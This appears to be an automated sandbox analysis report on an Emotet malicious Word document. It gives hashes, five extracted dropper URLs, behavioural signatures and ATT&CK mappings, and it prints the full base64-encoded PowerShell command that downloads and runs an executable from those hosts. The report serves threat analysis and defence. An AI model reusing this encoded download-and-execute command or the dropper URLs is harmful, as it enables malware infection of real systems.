Analysis

  • max time kernel
    139s
  • max time network
    124s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    19-09-2020 17:25

General

  • Target

    emotet_e3_cebe387ca85ab9f4935fb67afeb33c46a9c819516214ab1ee592afef6ee7e96f_2020-09-19__172346028370._doc.doc

  • Size

    229KB

  • MD5

    b6dee4a2f6e8dd2f67077d602dbba819

  • SHA1

    6fbfd4f9950d6f8154f82657ab3c1c95c1bd0f6d

  • SHA256

    cebe387ca85ab9f4935fb67afeb33c46a9c819516214ab1ee592afef6ee7e96f

  • SHA512

    55d68b34116f4c95bc01dcba8ccb4198363a46dfb7c529b0aa5f642e9ad24d9d09eede878b413160cca04ce395401b1486d52ffc061a2f936cab151cbd68dc23

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://arsan.com.br/img_b2w/jstgflap98/

exe.dropper

http://koester-pb.de/cgi-bin/HoDIPqV/

exe.dropper

http://aragonmetal.com/_installation/LPMGMZroO/

exe.dropper

https://www.witdigi.com/wp-content/uploads/iBeE/

exe.dropper

http://yellowstonefitness.com/j5es7cx/QgLkys4ga64g228/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 5 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_cebe387ca85ab9f4935fb67afeb33c46a9c819516214ab1ee592afef6ee7e96f_2020-09-19__172346028370._doc.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3888
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABQAGsAaAByADUAZABwAD0AJwBaAHAAawByAG0AawBxACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAEMAYABVAGAAUgBpAGAAVABZAFAAYABSAE8AVABPAGMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQARQA2AF8AdQBkAHAAMAAgAD0AIAAnAEMAYwBiAHAAJwA7ACQAWQBxADEAbwBsAHQAcQA9ACcASwBvADIAZgAzAHoAZAAnADsAJABCADgAOQB0ADUAcwB2AD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAFwAJwArACQARQA2AF8AdQBkAHAAMAArACcALgBlAHgAZQAnADsAJABOAHYAbQAwAHIAYgB0AD0AJwBGAGQAMAA3AG8AOABxACcAOwAkAFYAZgBnAHgAZQA3ADAAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQB0AC4AdwBFAGIAQwBMAGkARQBOAFQAOwAkAFgANwA1AHgAMQBvADAAPQAnAGgAdAB0AHAAOgAvAC8AYQByAHMAYQBuAC4AYwBvAG0ALgBiAHIALwBpAG0AZwBfAGIAMgB3AC8AagBzAHQAZwBmAGwAYQBwADkAOAAvACoAaAB0AHQAcAA6AC8ALwBrAG8AZQBzAHQAZQByAC0AcABiAC4AZABlAC8AYwBnAGkALQBiAGkAbgAvAEgAbwBEAEkAUABxAFYALwAqAGgAdAB0AHAAOgAvAC8AYQByAGEAZwBvAG4AbQBlAHQAYQBsAC4AYwBvAG0ALwBfAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuAC8ATABQAE0ARwBNAFoAcgBvAE8ALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHcAaQB0AGQAaQBnAGkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AaQBCAGUARQAvACoAaAB0AHQAcAA6AC8ALwB5AGUAbABsAG8AdwBzAHQAbwBuAGUAZgBpAHQAbgBlAHMAcwAuAGMAbwBtAC8AagA1AGUAcwA3AGMAeAAvAFEAZwBMAGsAeQBzADQAZwBhADYANABnADIAMgA4AC8AJwAuACIAcwBwAEwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABWADIAZgBmAHUANABmAD0AJwBRAHUAcwB3AHkAZgAxACcAOwBmAG8AcgBlAGEAYwBoACgAJABPADIAMwB6AGMAMQBiACAAaQBuACAAJABYADcANQB4ADEAbwAwACkAewB0AHIAeQB7ACQAVgBmAGcAeABlADcAMAAuACIARABPAFcAYABOAGwAbwBgAEEARABGAEkATABFACIAKAAkAE8AMgAzAHoAYwAxAGIALAAgACQAQgA4ADkAdAA1AHMAdgApADsAJABFAHkAdgB0ADEAdwAzAD0AJwBYAGwAZwBpAHYAdQByACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAQgA4ADkAdAA1AHMAdgApAC4AIgBMAGAARQBOAGcAVABoACIAIAAtAGcAZQAgADIAOQA5ADkAMQApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACgAJABCADgAOQB0ADUAcwB2ACkAOwAkAFMAbABiAHUAMABoADEAPQAnAEIAbQA4AHQAOQAyAGQAJwA7AGIAcgBlAGEAawA7ACQASAB6ADIAbAA5AG0AaQA9ACcARwBpAGkAeAA5ADEAYwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAHkAMAA1AHkAZABpAD0AJwBXAGQAeQBrADYAbgBhACcA
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:212

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/212-9-0x00007FF8B8060000-0x00007FF8B8A4C000-memory.dmp
    Filesize

    9.9MB

  • memory/212-10-0x0000018419BE0000-0x0000018419BE1000-memory.dmp
    Filesize

    4KB

  • memory/212-11-0x0000018419D90000-0x0000018419D91000-memory.dmp
    Filesize

    4KB

  • memory/3888-0-0x00007FF8BF460000-0x00007FF8BFB26000-memory.dmp
    Filesize

    6.8MB

  • memory/3888-5-0x000001BE4F472000-0x000001BE4F4A8000-memory.dmp
    Filesize

    216KB